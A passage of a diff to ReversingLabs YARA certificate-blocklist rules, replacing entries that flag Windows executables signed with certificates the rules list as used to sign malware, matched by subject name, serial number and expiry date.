"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13150-L13166" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6f2489421f2effa2089b744f7e137818935fe2339d9216a42686012c51da677b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7182-L7200" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7f10b86f156ccac695f480661dfea8bcc455477afd9575230c2f8510327d1996" score = 75 quality = 90 tags = "INFO, FILE" @@ -18387,22 +38178,22 @@ rule REVERSINGLABS_Cert_Blocklist_5Fe0Ad6B03C57Ab67A352159004Ca3Db : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SpectorSoft Corp." and pe.signatures[i].serial=="5f:e0:ad:6b:03:c5:7a:b6:7a:35:21:59:00:4c:a3:db" and 1402272000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DEVELOP - Residence s. r. o." and (pe.signatures[i].serial=="00:e3:d5:08:9d:4b:8f:01:aa:dc:e2:73:10:62:fb:0c:ce" or pe.signatures[i].serial=="e3:d5:08:9d:4b:8f:01:aa:dc:e2:73:10:62:fb:0c:ce") and 1618358400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_642Ad8E5Ef8B3Ac767F0D5C1A999Bdaa : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7Ed801843Fa001B8Add52D3A97B25931 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d29e2342-2d38-5939-aa3f-4506fb36c74a" + id = "7c685bb7-3201-5ffc-856b-657d824595ab" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13168-L13184" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d42d40ca381b99b68a3384cecf585aab2acca66d4e13503d337b1605d587d0b5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7202-L7218" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b7c9424520afe16bd4769e1be84163ac37b8fb37433931f2e362d90cacc01093" score = 75 quality = 90 tags = "INFO, FILE" @@ -18412,22 +38203,22 @@ rule REVERSINGLABS_Cert_Blocklist_642Ad8E5Ef8B3Ac767F0D5C1A999Bdaa : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Itgms Ltd" and pe.signatures[i].serial=="64:2a:d8:e5:ef:8b:3a:c7:67:f0:d5:c1:a9:99:bd:aa" and 1447804800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AM El-Teknik ApS" and pe.signatures[i].serial=="7e:d8:01:84:3f:a0:01:b8:ad:d5:2d:3a:97:b2:59:31" and 1614297600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5333D3079D8Afda715703775E1389991 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D9E834182Dec62C654E775E809Ac1D1B : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4db299c6-5be9-5900-a944-07a0a41920a4" + id = "30831e91-c2aa-50bc-a0e9-ee7574fc58f4" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13186-L13202" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "98bd9d35c4e196a11943826115ab495833f7ef1d95f9736cc24255d6dd4fd21c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7220-L7238" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3d8075e34fa3dc221bc2abc2630a93f32efbdde6df270a77b1d6b64d8ce56133" score = 75 quality = 90 tags = "INFO, FILE" @@ -18437,22 +38228,22 @@ rule REVERSINGLABS_Cert_Blocklist_5333D3079D8Afda715703775E1389991 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Trambambon LLC" and pe.signatures[i].serial=="53:33:d3:07:9d:8a:fd:a7:15:70:37:75:e1:38:99:91" and 1239148800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FoodLehto Oy" and (pe.signatures[i].serial=="00:d9:e8:34:18:2d:ec:62:c6:54:e7:75:e8:09:ac:1d:1b" or pe.signatures[i].serial=="d9:e8:34:18:2d:ec:62:c6:54:e7:75:e8:09:ac:1d:1b") and 1614297600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_139A7Ee1F1A7735C151089755Df5D373 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_801689896Ed339237464A41A2900A969 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "eaab67a1-ed7a-58f3-afb3-3637c3b72020" + id = "0ef4ce5c-b2a1-59e8-8d39-3cf7ab9fd0e1" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13204-L13220" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "86072fef7d1488dc257c3ca8fbb99620ec06f8ecb671b4e20d09d0ce6cc8601d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7240-L7258" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a371092cbf5a1a0c8051ba2b4c9dd758d829a2f0c21c86d1920164a0ae7751e6" score = 75 quality = 90 tags = "INFO, FILE" @@ -18462,22 +38253,22 @@ rule REVERSINGLABS_Cert_Blocklist_139A7Ee1F1A7735C151089755Df5D373 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yongli Li" and pe.signatures[i].serial=="13:9a:7e:e1:f1:a7:73:5c:15:10:89:75:5d:f5:d3:73" and 1476057600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GLG Rental ApS" and (pe.signatures[i].serial=="00:80:16:89:89:6e:d3:39:23:74:64:a4:1a:29:00:a9:69" or pe.signatures[i].serial=="80:16:89:89:6e:d3:39:23:74:64:a4:1a:29:00:a9:69") and 1615507200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_74Dbe83082E1B3Dfa29F9C24 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3Fd3661533Eef209153C9Afec3Ba4D8A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "dbb75cf2-1b48-52f1-8d06-e35d48c4fea4" + id = "e45d66b0-58ae-5054-b0a7-47a001daac7a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13222-L13238" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1fdf6471d0b869df1a8630108cdaf1cc97d33e91d4726073913cdc54c7cf0042" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7260-L7276" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ce6c07b8ae54db03e4fa2739856a8d3dc2051c051a10c3c73501dad4296dde97" score = 75 quality = 90 tags = "INFO, FILE" @@ -18487,22 +38278,22 @@ rule REVERSINGLABS_Cert_Blocklist_74Dbe83082E1B3Dfa29F9C24 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "EVANGEL TECHNOLOGY(HK) LIMITED" and pe.signatures[i].serial=="74:db:e8:30:82:e1:b3:df:a2:9f:9c:24" and 1468817578<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SFB Regnskabsservice ApS" and pe.signatures[i].serial=="3f:d3:66:15:33:ee:f2:09:15:3c:9a:fe:c3:ba:4d:8a" and 1614816000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0A466553A6391Aafd181B400266C7B18 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0Ced87Bd70B092Cb93B182Fac32655F6 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ef8ff250-840f-5b55-b0c7-85ca54aadc59" + id = "b9e6a35f-08c2-5f29-9bcf-07a3cddf0fbe" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13240-L13256" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cb21e5759887904d6a38cd1b363610ebc0bfd9a357050c602210468992815cbe" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7278-L7294" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4e2c967b9502d9009c61831f019ba19367b866e898ca1246a1099d75ad0eb4d5" score = 75 quality = 90 tags = "INFO, FILE" @@ -18512,22 +38303,22 @@ rule REVERSINGLABS_Cert_Blocklist_0A466553A6391Aafd181B400266C7B18 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PhaseQ Limited" and pe.signatures[i].serial=="0a:46:65:53:a6:39:1a:af:d1:81:b4:00:26:6c:7b:18" and 1555545600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Creator Soft Limited" and pe.signatures[i].serial=="0c:ed:87:bd:70:b0:92:cb:93:b1:82:fa:c3:26:55:f6" and 1614816000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0D3Dec8794Fa7228D1Ee40Eeb8187149 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_047801D5B55C800B48411Fd8C320Ca5B : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "54e9ec00-d054-521b-b60b-81efe3a8ce12" + id = "602b8c18-3dad-55b9-bb47-3f9835a049ac" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13258-L13274" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "20084dc0b069d65755f859f5aef4be5599d1f066ba006199d3ce803b0d8f041e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7296-L7312" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ef26b4e3c658f53f3048d10bd1b7a2a198cd402e1b7c60e84adadb4f236ccb5d" score = 75 quality = 90 tags = "INFO, FILE" @@ -18537,22 +38328,22 @@ rule REVERSINGLABS_Cert_Blocklist_0D3Dec8794Fa7228D1Ee40Eeb8187149 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Financial Security Institute, Inc." and pe.signatures[i].serial=="0d:3d:ec:87:94:fa:72:28:d1:ee:40:ee:b8:18:71:49" and 1582675200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LICHFIELD STUDIO GLASS LIMITED" and pe.signatures[i].serial=="04:78:01:d5:b5:5c:80:0b:48:41:1f:d8:c3:20:ca:5b" and 1614297600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_24Af70B5D17A63Ad053E5821 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0F0Ed5318848703405D40F7C62D0F39A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "034228b3-1864-5a76-ad9d-531778be10ec" + id = "30e3a977-caa3-5ae0-9cd0-6b2ce62ccebd" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13276-L13292" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d78f709067c83169484d9dd6e1dd8a88852362da028551d4e55e5703a22e04a7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7314-L7330" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "484932ddfe614fd5ab22361ab281cda62803c98279f938aa5237237fae6a95d6" score = 75 quality = 90 tags = "INFO, FILE" @@ -18562,22 +38353,22 @@ rule REVERSINGLABS_Cert_Blocklist_24Af70B5D17A63Ad053E5821 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="24:af:70:b5:d1:7a:63:ad:05:3e:58:21" and 1474179615<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SIES UPRAVLENIE PROTSESSAMI, OOO" and pe.signatures[i].serial=="0f:0e:d5:31:88:48:70:34:05:d4:0f:7c:62:d0:f3:9a" and 1614729600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_402E9Fcba61E5Eaf9C0C7B3Bfd6259D9 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4E7545C9Fc5938F5198Ab9F1749Ca31C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a24e1201-4a90-5d0f-ac19-4d88a4e4cfe5" + id = "d5f810ee-127a-5df0-9299-ffeaddf369ee" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13294-L13310" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1bfc2610745a98ebcf0f77504815d9d1c448697fbe407d6c2e075219b401de50" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7332-L7348" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f6be57eb6744ad6d239a0a2cc1ec8c39c9dfd4e4eeb3be9e699516c259f617f0" score = 75 quality = 90 tags = "INFO, FILE" @@ -18587,22 +38378,22 @@ rule REVERSINGLABS_Cert_Blocklist_402E9Fcba61E5Eaf9C0C7B3Bfd6259D9 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yongli Li" and pe.signatures[i].serial=="40:2e:9f:cb:a6:1e:5e:af:9c:0c:7b:3b:fd:62:59:d9" and 1477440000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "For M d.o.o." and pe.signatures[i].serial=="4e:75:45:c9:fc:59:38:f5:19:8a:b9:f1:74:9c:a3:1c" and 1614297600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2C84F9136059E96134F8766670Eacd52 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7Ddd3796A427B42F2E52D7C7Af0Ca54F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "af7eb5ff-570f-5886-b550-3d327d05fabe" + id = "5c2e1f5b-5ff7-51d7-9642-0a527856814c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13312-L13328" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d6778630dcc3e4fe2816e6dee1b823e616f53de8a924057495c7c252948a71b4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7350-L7366" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "804ab8c44e5d97d8e14f852d61094e90d1e3ace66316781e9e79ab46fc7db8e7" score = 75 quality = 90 tags = "INFO, FILE" @@ -18612,22 +38403,22 @@ rule REVERSINGLABS_Cert_Blocklist_2C84F9136059E96134F8766670Eacd52 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, DIEGO MANUEL RODRIGUEZ" and pe.signatures[i].serial=="2c:84:f9:13:60:59:e9:61:34:f8:76:66:70:ea:cd:52" and 1442215311<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Fobos" and pe.signatures[i].serial=="7d:dd:37:96:a4:27:b4:2f:2e:52:d7:c7:af:0c:a5:4f" and 1612915200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6716A9C195987D5Cfe53A094779461E7 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_03B27D7F4Ee21A462A064A17Eef70D6C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "fbd05f8b-3289-565c-a5f4-a1514d06ae37" + id = "9d32947c-778f-5e2d-b0b1-4a17a108035e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13330-L13346" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "648fd70432a791b3e589f5eda1b1510045b465623914a9762ff3dfb4a3e022f8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7368-L7384" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b303751e354c346f73368de94b66a960dd12efa0730d2ab14af743810669ac81" score = 75 quality = 90 tags = "INFO, FILE" @@ -18637,22 +38428,22 @@ rule REVERSINGLABS_Cert_Blocklist_6716A9C195987D5Cfe53A094779461E7 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Inter Technologies Ltd." and pe.signatures[i].serial=="67:16:a9:c1:95:98:7d:5c:fe:53:a0:94:77:94:61:e7" and 1169424000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CCL TRADING LIMITED" and pe.signatures[i].serial=="03:b2:7d:7f:4e:e2:1a:46:2a:06:4a:17:ee:f7:0d:6c" and 1613952000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_876C00Bd665Df98B35554F67A5C1C32A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B0A308Fc2E71Ac4Ac40677B9C27Ccbad : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "830af0ac-fb01-5c6a-a7a3-2cf5c9d016fc" + id = "7e13e257-a264-5a40-b670-889045504acf" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13348-L13366" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "90bde1313db78d4166e8c87e7e4111c576880922b1c983f3a842ea030d38a0da" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7386-L7404" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "21fd7625399c939b6d03100b731709616d206a3811197af2b86991be9d89b4eb" score = 75 quality = 90 tags = "INFO, FILE" @@ -18662,22 +38453,22 @@ rule REVERSINGLABS_Cert_Blocklist_876C00Bd665Df98B35554F67A5C1C32A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Lossera-M, OOO" and (pe.signatures[i].serial=="00:87:6c:00:bd:66:5d:f9:8b:35:55:4f:67:a5:c1:c3:2a" or pe.signatures[i].serial=="87:6c:00:bd:66:5d:f9:8b:35:55:4f:67:a5:c1:c3:2a") and 1493078400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Volpayk LLC" and (pe.signatures[i].serial=="00:b0:a3:08:fc:2e:71:ac:4a:c4:06:77:b9:c2:7c:cb:ad" or pe.signatures[i].serial=="b0:a3:08:fc:2e:71:ac:4a:c4:06:77:b9:c2:7c:cb:ad") and 1611705600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4B093Cb60D4B992266F550934A4Ac7D0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_61B11Ef9726Ab2E78132E01Bd791B336 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c459c3ac-205c-5c13-959d-c6b40f81222f" + id = "573a024e-11f0-5cf9-8f0d-a946cdca34c5" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13368-L13384" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4b634bc706638d72f2d036d41cf092cac538e930d7d407eebc225b482fd64f51" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7406-L7422" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1a8e72f31039a5a5602d0314f017a2596a23e4a796dc66167dfefc0c9790e3e3" score = 75 quality = 90 tags = "INFO, FILE" @@ -18687,22 +38478,22 @@ rule REVERSINGLABS_Cert_Blocklist_4B093Cb60D4B992266F550934A4Ac7D0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LCB SISTEMAS LTDA ME" and pe.signatures[i].serial=="4b:09:3c:b6:0d:4b:99:22:66:f5:50:93:4a:4a:c7:d0" and 1478649600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Skalari" and pe.signatures[i].serial=="61:b1:1e:f9:72:6a:b2:e7:81:32:e0:1b:d7:91:b3:36" and 1609372800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2050B54146B011Ed30F60F61 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_8Fe807310D98357A59382090634B93F0 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0db2d42d-bdc3-50bc-b360-a39ccec4df41" + id = "690e7919-0344-5bd1-849f-e7bfe2f19276" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13386-L13402" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "74749317fcefcdb698046a6f42c6c6e05cc1eab1370b3b1fd7d025f49de4a032" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7424-L7442" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0ec56bd4783c854efef863050ff729fd99efa98b7b19e04e56a080ee3e75cd90" score = 75 quality = 90 tags = "INFO, FILE" @@ -18712,22 +38503,22 @@ rule REVERSINGLABS_Cert_Blocklist_2050B54146B011Ed30F60F61 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="20:50:b5:41:46:b0:11:ed:30:f6:0f:61" and 1476773926<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MAVE MEDIA" and (pe.signatures[i].serial=="00:8f:e8:07:31:0d:98:35:7a:59:38:20:90:63:4b:93:f0" or pe.signatures[i].serial=="8f:e8:07:31:0d:98:35:7a:59:38:20:90:63:4b:93:f0") and 1613433600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_73E2F34C9C2435F29Bbe0A3C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B97F66Bb221772Dc07Ef1D4Bed8F6085 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "284c206f-8a0c-5bb6-8f28-d8e5e60efe3e" + id = "c83918d8-fe90-59dc-8f4e-0e7b10238780" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = 